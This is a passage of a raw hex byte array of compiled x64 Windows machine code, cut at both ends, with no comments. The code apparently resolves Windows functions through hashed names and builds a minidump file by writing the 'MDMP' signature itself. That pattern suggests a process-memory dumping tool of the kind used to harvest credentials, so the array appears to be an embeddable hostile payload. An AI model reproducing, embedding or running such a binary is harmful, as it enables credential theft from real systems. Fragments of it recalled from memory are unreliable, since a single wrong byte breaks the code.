x00,0x48,0x89,0xC1,0xE8,0xCB,0xF9,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x8F,0x97,0x38,0x8D,0x48,0x89,0xC1,0xE8,0xD9,0xF7,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x0F,0x84,0x87,0x00,0x00,0x00,0x48,0x8B,0x05,0xAD,0xAB,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x00,0x10,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9E,0xAB,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x57,0x48,0x8B,0x45,0x28,0x48,0x8B,0x10,0x48,0x8D,0x4D,0xEC,0x48,0x8B,0x45,0x20,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4C,0x8B,0x55,0xF0,0x49,0x89,0xC9,0x41,0xB8,0x00,0x10,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x26,0x8B,0x45,0xEC,0x85,0xC0,0x74,0x1F,0x48,0x83,0x7D,0x30,0x00,0x74,0x09,0x8B,0x55,0xEC,0x48,0x8B,0x45,0x30,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x83,0x7D,0xFC,0x00,0x75,0x3B,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x2F,0x48,0x8B,0x45,0x28,0x48,0x8B,0x18,0x48,0x8B,0x05,0x06,0xAB,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x02,0xAB,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x28,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x58,0x5B,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0xA3,0xAA,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x00,0x10,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x94,0xAA,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x0F,0x84,0xBF,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x45,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x84,0x9F,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x85,0xC0,0x0F,0x85,0x94,0x00,0x00,0x00,0x48,0x83,0x7D,0x28,0x00,0x74,0x50,0x48,0x8B,0x05,0x3A,0xAA,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x05,0x01,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x2B,0xAA,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0x28,0x48,0x89,0x02,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x5D,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x50,0x08,0x48,0x8B,0x45,0x28,0x48,0x8B,0x00,0x41,0xB8,0x05,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x49,0x18,0x00,0x00,0x48,0x83,0x7D,0x30,0x00,0x74,0x10,0x48,0x8B,0x45,0xF0,0x8B,0x90,0x30,0x08,0x00,0x00,0x48,0x8B,0x45,0x30,0x89,0x10,0x48,0x83,0x7D,0x38,0x00,0x74,0x10,0x48,0x8B,0x45,0xF0,0x8B,0x90,0x34,0x08,0x00,0x00,0x48,0x8B,0x45,0x38,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0x9C,0xA9,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x98,0xA9,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x50,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xB9,0x39,0x00,0x00,0x48,0x89,0xC1,0xE8,0x2C,0xF7,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x6F,0x1B,0x7C,0xED,0x48,0x89,0xC1,0xE8,0x3A,0xF5,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x4A,0x4C,0x8D,0x45,0xEC,0x8B,0x4D,0x20,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x4C,0x8B,0x55,0xF0,0x4D,0x89,0xC1,0x41,0x89,0xC8,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x75,0x10,0x48,0x8B,0x05,0xD9,0xA8,0x00,0x00,0xFF,0xD0,0x3D,0xE5,0x03,0x00,0x00,0x75,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x50,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x44,0x89,0x4D,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x8D,0xA8,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x38,0x08,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x7E,0xA8,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x66,0x48,0x8B,0x45,0xF0,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x48,0x8D,0x48,0x08,0x48,0x8B,0x45,0x18,0x41,0xB8,0x05,0x01,0x00,0x00,0x48,0x89,0xC2,0xE8,0x9D,0x16,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x20,0x89,0x90,0x30,0x08,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x28,0x89,0x90,0x34,0x08,0x00,0x00,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x38,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x99,0xFE,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0xF1,0xA7,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE9,0xA7,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x74,0x07,0x48,0x83,0x7D,0x10,0xFF,0x75,0x07,0xB8,0x01,0x00,0x00,0x00,0xEB,0x60,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x05,0x38,0x00,0x00,0x48,0x89,0xC1,0xE8,0x78,0xF5,0xFF,0xFF,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xEA,0x7A,0xA4,0xAE,0x48,0x89,0xC1,0xE8,0x86,0xF3,0xFF,0xFF,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x1F,0x48,0x8B,0x45,0x10,0x48,0x8B,0x55,0xF0,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x0D,0xA7,0x00,0x00,0xFF,0xD0,0x41,0xB8,0x38,0x08,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xFE,0xA6,0x00,0x00,0xFF,0xD0,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x3C,0x48,0x8B,0x45,0xF0,0xC7,0x00,0x01,0x00,0x00,0x00,0x48,0x8B,0x45,0xF0,0x8B,0x55,0x18,0x89,0x50,0x08,0x48,0x8B,0x55,0xF0,0x48,0x8B,0x45,0x10,0x41,0xB8,0x38,0x08,0x00,0x00,0x48,0x89,0xC1,0xE8,0x43,0xFD,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x83,0x7D,0xF0,0x00,0x74,0x21,0x48,0x8B,0x05,0x9B,0xA6,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xF0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x93,0xA6,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x53,0x48,0x83,0xEC,0x38,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0x4D,0x20,0x48,0x89,0x55,0x28,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xF0,0x48,0x8B,0x45,0x20,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1B,0xFA,0xFF,0xFF,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x74,0x21,0x48,0x8B,0x45,0xF0,0x8B,0x00,0x83,0xF8,0x01,0x75,0x19,0x48,0x8B,0x45,0xF0,0x8B,0x50,0x08,0x48,0x8B,0x45,0x28,0x89,0x10,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xF0,0x48,0x8B,0x05,0xF7,0xA5,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF3,0xA5,0x00,0x00,0xFF,0xD0,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x38,0x5B,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x57,0x53,0x48,0x81,0xEC,0xA0,0x02,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0xC7,0x85,0x00,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xF8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0xF4,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x85,0xC0,0x01,0x00,0x00,0x0F,0x11,0x85,0xD0,0x01,0x00,0x00,0x66,0x0F,0xD6,0x85,0xE0,0x01,0x00,0x00,0xC7,0x85,0x1C,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x18,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x10,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xB8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x08,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xB0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x41,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0xC7,0x45,0xA0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0x48,0x8D,0x85,0x00,0x02,0x00,0x00,0x49,0x89,0xC0,0xBA,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0xF5,0x35,0x00,0x00,0x48,0x89,0xC1,0xE8,0xAD,0xF4,0xFF,0xFF,0x89,0x85,0x18,0x02,0x00,0x00,0x83,0xBD,0x18,0x02,0x00,0x00,0x00,0x0F,0x84,0xE4,0x01,0x00,0x00,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x37,0xF8,0xFF,0xFF,0x89,0x85,0x18,0x02,0x00,0x00,0x83,0xBD,0x18,0x02,0x00,0x00,0x00,0x0F,0x84,0xC5,0x01,0x00,0x00,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x8D,0x8D,0xF4,0x01,0x00,0x00,0x48,0x8D,0x95,0xF8,0x01,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0xD7,0xF9,0xFF,0xFF,0x89,0x85,0x18,0x02,0x00,0x00,0x83,0xBD,0x18,0x02,0x00,0x00,0x00,0x0F,0x84,0x8F,0x01,0x00,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xA8,0x66,0xC7,0x45,0xA0,0x00,0x00,0x66,0xC7,0x45,0xA2,0x00,0x00,0x48,0xC7,0x85,0xC8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0xD8,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x95,0xF8,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC1,0xE8,0x87,0xAA,0xFF,0xFF,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC1,0xE8,0x27,0xAD,0xFF,0xFF,0x85,0xC0,0x0F,0x84,0x41,0x01,0x00,0x00,0x8B,0x85,0xF4,0x01,0x00,0x00,0x85,0xC0,0x74,0x1E,0xC7,0x85,0xE0,0x01,0x00,0x00,0x4D,0x44,0x4D,0x50,0x66,0xC7,0x85,0xE4,0x01,0x00,0x00,0x93,0xA7,0x66,0xC7,0x85,0xE6,0x01,0x00,0x00,0x00,0x00,0xEB,0x2C,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x8D,0x48,0x26,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x8D,0x50,0x24,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x83,0xC0,0x20,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x19,0xB4,0xFF,0xFF,0x48,0xC7,0x85,0x10,0x02,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x48,0xC7,0x85,0xB8,0x01,0x00,0x00,0x00,0x00,0x80,0x0C,0x48,0x8D,0x85,0xB8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x1C,0xB3,0xFF,0xFF,0x48,0x89,0x85,0x08,0x02,0x00,0x00,0x48,0x83,0xBD,0x08,0x02,0x00,0x00,0x00,0x0F,0x84,0xB6,0x00,0x00,0x00,0x48,0x8B,0x85,0x10,0x02,0x00,0x00,0x48,0x89,0x85,0xC0,0x01,0x00,0x00,0x48,0x8B,0x85,0x08,0x02,0x00,0x00,0x48,0x89,0x85,0xC8,0x01,0x00,0x00,0xC7,0x85,0xD0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x85,0xB8,0x01,0x00,0x00,0x48,0x89,0x85,0xD8,0x01,0x00,0x00,0x48,0x8D,0x85,0xC0,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x42,0xEB,0xFF,0xFF,0x89,0x85,0x18,0x02,0x00,0x00,0x83,0xBD,0x18,0x02,0x00,0x00,0x00,0x74,0x67,0x8B,0x85,0xF4,0x01,0x00,0x00,0x85,0xC0,0x75,0x17,0x8B,0x85,0xD0,0x01,0x00,0x00,0x89,0xC2,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0xF2,0xB2,0xFF,0xFF,0x8B,0x8D,0xD0,0x01,0x00,0x00,0x48,0x8B,0x95,0xC8,0x01,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x9A,0xAA,0xFF,0xFF,0x89,0x85,0x18,0x02,0x00,0x00,0x83,0xBD,0x18,0x02,0x00,0x00,0x00,0x74,0x1E,0xC7,0x85,0x1C,0x02,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x13,0x90,0xEB,0x10,0x90,0xEB,0x0D,0x90,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x22,0x48,0x8B,0x85,0xD8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x16,0x48,0x8B,0x95,0xD8,0x01,0x00,0x00,0x48,0x8B,0x85,0xC8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x89,0xB2,0xFF,0xFF,0x83,0xBD,0x1C,0x02,0x00,0x00,0x00,0x75,0x0F,0x48,0x8B,0x85,0xF8,0x01,0x00,0x00,0x48,0x89,0xC1,0xE8,0x90,0xAC,0xFF,0xFF,0x48,0x8B,0x85,0xF8,0x01,0x00,0x00,0x48,0x85,0xC0,0x74,0x24,0x48,0x8B,0x9D,0xF8,0x01,0x00,0x00,0x48,0x8B,0x05,0xA3,0xA2,0x00,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9F,0xA2,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x8B,0x95,0x1C,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x3F,0xFB,0xFF,0xFF,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x8F,0xFA,0xFF,0xFF,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x00,0x02,0x00,0x00,0x48,0x89,0xC1,0xE8,0x18,0xC3,0xFF,0xFF,0x8B,0x85,0x1C,0x02,0x00,0x00,0x48,0x81,0xC4,0xA0,0x02,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x4C,0x89,0x45,0x20,0x83,0x7D,0x18,0x03,0x74,0x25,0x83,0x7D,0x18,0x03,0x77,0x26,0x83,0x7D,0x18,0x02,0x74,0x1C,0x83,0x7D,0x18,0x02,0x77,0x1A,0x83,0x7D,0x18,0x00,0x74,0x13,0x83,0x7D,0x18,0x01,0x75,0x0E,0xE8,0x25,0xFC,0xFF,0xFF,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0xB8,0x00,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x8B,0x05,0x41,0x20,0x00,0x00,0x48,0x8B,0x00,0x48,0x85,0xC0,0x74,0x26,0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0xFF,0xD0,0x48,0x8B,0x05,0x27,0x20,0x00,0x00,0x48,0x8D,0x50,0x08,0x48,0x8B,0x40,0x08,0x48,0x89,0x15,0x18,0x20,0x00,0x00,0x48,0x85,0xC0,0x75,0xE3,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x66,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x15,0x4D,0x34,0x00,0x00,0x48,0x8B,0x02,0x89,0xC1,0x83,0xF8,0xFF,0x74,0x43,0x85,0xC9,0x74,0x22,0x89,0xC8,0x83,0xE9,0x01,0x48,0x8D,0x1C,0xC2,0x48,0x29,0xC8,0x48,0x8D,0x74,0xC2,0xF8,0x66,0x0F,0x1F,0x44,0x00,0x00,0xFF,0x13,0x48,0x83,0xEB,0x08,0x48,0x39,0xF3,0x75,0xF5,0x48,0x8D,0x0D,0x66,0xFF,0xFF,0xFF,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xE9,0xFA,0xA2,0xFF,0xFF,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x31,0xC0,0x66,0x0F,0x1F,0x44,0x00,0x00,0x44,0x8D,0x40,0x01,0x89,0xC1,0x4A,0x83,0x3C,0xC2,0x00,0x4C,0x89,0xC0,0x75,0xF0,0xEB,0xA3,0x66,0x0F,0x1F,0x44,0x00,0x00,0x8B,0x05,0x0A,0x82,0x00,0x00,0x85,0xC0,0x74,0x06,0xC3,0x0F,0x1F,0x44,0x00,0x00,0xC7,0x05,0xF6,0x81,0x00,0x00,0x01,0x00,0x00,0x00,0xE9,0x61,0xFF,0xFF,0xFF,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x83,0xFA,0x03,0x74,0x13,0x85,0xD2,0x74,0x0F,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0xE8,0x8B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x56,0x53,0x48,0x83,0xEC,0x20,0x48,0x8D,0x6C,0x24,0x20,0x48,0x8B,0x05,0x6D,0x33,0x00,0x00,0x83,0x38,0x02,0x74,0x06,0xC7,0x00,0x02,0x00,0x00,0x00,0x83,0xFA,0x02,0x74,0x15,0x83,0xFA,0x01,0x74,0x48,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x0F,0x1F,0x00,0x48,0x8D,0x1D,0x31,0xAF,0x00,0x00,0x48,0x8D,0x35,0x2A,0xAF,0x00,0x00,0x48,0x39,0xF3,0x74,0xDD,0x0F,0x1F,0x44,0x00,0x00,0x48,0x8B,0x03,0x48,0x85,0xC0,0x74,0x02,0xFF,0xD0,0x48,0x83,0xC3,0x08,0x48,0x39,0xF3,0x75,0xED,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0xE8,0x0B,0x07,0x00,0x00,0xB8,0x01,0x00,0x00,0x00,0x48,0x83,0xC4,0x20,0x5B,0x5E,0x5D,0xC3,0x66,0x66,0x2E,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00,0x0F,0x1F,0x00,0x31,0xC0,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x56,0x53,0x48,0x83,0xEC,0x30,0x48,0x8D,0x6C,0x24,0x30,0x48,0x89,0xCB,0x48,0x8D,0x45,0x28,0xB9,0x02,0x00,0x00,0x00,0x48,0x89,0x55,0x28,0x4C,0x89,0x45,0x30,0x4C,0x89,0x4D,0x38,0x48,0x89,0x45,0xF8,0xE8,0x43,0x0C,0x00,0x00,0x41,0xB8,0x1B,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x0D,0x41,0x31,0x00,0x00,0x49,0x89,0xC1,0xE8,0x19,0x0E,0x00,0x00,0x48,0x8B,0x75,0xF8,0xB9,0x02,0x00,0x00,0x00,0xE8,0x1B,0x0C,0x00,0x00,0x48,0x89,0xDA,0x48,0x89,0xC1,0x49,0x89,0xF0,0xE8,0x65,0x0E,0x00,0x00,0xE8,0xE0,0x0D,0x00,0x00,0x90,0x0F,0x1F,0x80,0x00,0x00,0x00,0x00,0x55,0x57,0x56,0x53,0x48,0x83,0xEC,0x58,0x48,0x8D,0x6C,0x24,0x50,0x48,0x63,0x35,0xE0,0x80,0x00,0x00,0x48,0x89,0xCB,0x85,0xF6,0x0F,0x8E,0x11,0x01,0x00,0x00,0x48,0x8B,0x05,0xD2,0x80,0x00,0x00,0x45,0x31,0xC9,0x48,0x83,0xC0,0x18,0x0F,0x1F,0x00,0x4C,0x8B,0x00,0x4C,0x39,0xC3,0x72,0x13,0x48,0x8B,0x50,0x08,0x8B,0x52,0x08,0x49,0x01,0xD0,0x4C,0x39,0xC3,0x0F,0x82,0x88,0x00,0x00,0x00,0x41,0x83,0xC1,0x01,0x48,0x83,0xC0,0x28,0x41,0x39,0xF1,0x75,0xD8,0x48,0x89,0xD9,0xE8,0x40,0x08,0x00,0x00,0x48,0x89,0xC7,0x48,0x85,0xC0,0x0F,0x84,0xE6,0x00,0x00,0x00,0x48,0x8B,0x05,0x85,0x80,0x00,0x00,0x48,0x8D,0x1C,0xB6,0x48,0xC1,0xE3,0x03,0x48,0x01,0xD8,0x48,0x89,0x78,0x20,0xC7,0x00,0x00,0x00,0x00,0x00,0xE8,0x53,0x09,0x00,0x00,0x8B,0x57,0x0C,0x41,0xB8,0x30,0x00,0x00,0x00,0x48,0x8D,0x0C,0x10,0x48,0x8B,0x05,0x57,0x80,0x00,0x00,0x48,0x8D,0x55,0xD0,0x48,0x89,0x4C,0x18,0x18,0xFF,0x15,0x40,0x9F,0x00,0x00,0x48,0x85,0xC0,0x0F,0x84,0x7E,0x00,0x00,0x00,0x8B,0x45,0xF4,0x8D,0x50,0xFC,0x83,0xE2,0xFB,0x74,0x08,0x8D,0x50,0xC0,0x83,0xE2,0xBF,0x75,0x14,0x83,0x05,0x21,0x80,0x00,0x00,0x01,0x48,0x83,0xC4,0x58,0x5B,0x5E,0x5F,0x5D,0xC3,0x0F,0x1F,0x40,0x00,0x83,0xF8,0x02,0x48,0x8B,0x4D,0xD0,0x48,0x8B,0x55,0xE8,0x41,0xB8,0x40,0x00,0x00,0x00,0xB8,0x04,0x00,0x00,0x00,0x44,0x0F,0x44,0xC0,0x48,0x03,0x1D,0xF7,0x7F,0x00,0x00,0x48,0x89,0x4B,0x08,0x49,0x89,0xD9,0x48,0x89,0x53,0x10,0xFF,0x15,0xD6,0x9E,0x00,0x00,0x85,0xC0,0x75,0xB6,0xFF,0x15,0x8C,0x9E,0x00,0x00,0x48,0x8D,0x0D,0x65,0x30,0x00,0x00,0x89,0xC2,0xE8,0x66,0xFE,0xFF,0xFF,0x66,0x0F,0x1F,0x44,0x00,0x00,0x31,0xF6,0xE9,0x21,0xFF,0xFF,0xFF,0x48,0x8B,0x05,0xBA,0x7F,0x00,0x00,0x8B,0x57,0x08,0x48,0x8D,0x0D,0x08,0x30,0x00,0x00,0x4C,0x8B,0x44,0x18,0x18,0xE8,0x3